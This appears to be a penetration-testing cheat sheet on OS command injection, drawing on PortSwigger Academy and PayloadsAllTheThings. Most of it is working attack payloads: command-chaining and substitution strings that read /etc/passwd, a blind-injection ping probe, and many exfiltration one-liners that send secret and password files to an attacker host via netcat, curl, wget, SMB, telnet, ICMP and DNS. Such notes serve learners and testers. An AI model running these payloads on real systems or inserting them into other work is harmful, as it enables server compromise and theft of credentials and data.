OS injection

From PortSwigger Academy

Description

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an attacker can leverage an OS command injection vulnerability to compromise other parts of the hosting infrastructure, exploiting trust relationships to pivot the attack to other systems within the organization.

Resources

PayloadsAllTheThings/Command Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

Accenture | Let there be changewww.contextis.com

How to inject

Basic commands

cat /etc/passwd

Chaining commands

original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls    Only if the first cmd fail

Inside a command

original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)

Blind OS command injection

Confirm the injection

& ping –c 10 127.0.0.1 &

Data exfiltration

using netcat listener

#linux
nc –lp {port} < {file/to/extract}

#windows
type {file to extract}  | nc -L -p {port}

using cURL

#post to webserver
cat /path/to/file | curl –F “:data=@-“ http://<ip>:<port>/test.txt

#transfer to ftp
curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user :{password}

using wget

wget –header=”EVIL:$(cat /data/secret/password.txt)”http://<ip>:<port>
wget –post-data exfil=`cat /data/secret/secretcode.txt` http://<ip>:<port>
wget –post-file trophy.php http://<ip>:<port>

using SMB

#on Windows
net use h: \\<ip>\web /user: {password} && copy {File to Copy} h:\{filename}.txt

using telnet

telnet <ip> {port} < {file to transfer}

using icmp

#on Linux
cat password.txt | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

#In Wireshark we can observe the packets containing our data.  You could write a script which scrapes the packets and re-assembles the file on the host

using DNS

cat /data/secret/password.txt | xxd -p -c 16 | while read exfil; do host $exfil.contextis.com 192.168.107.135; done

#In Wireshark we can observe the packets containing our data.  You could write a script which scrapes the packets and re-assembles the file on the host

PreviousAuthentication NextCSRF

Last updated 4 years ago

hashtagDescription

hashtagResources

hashtagHow to inject

hashtagBlind OS command injection

hashtagConfirm the injection

hashtagData exfiltration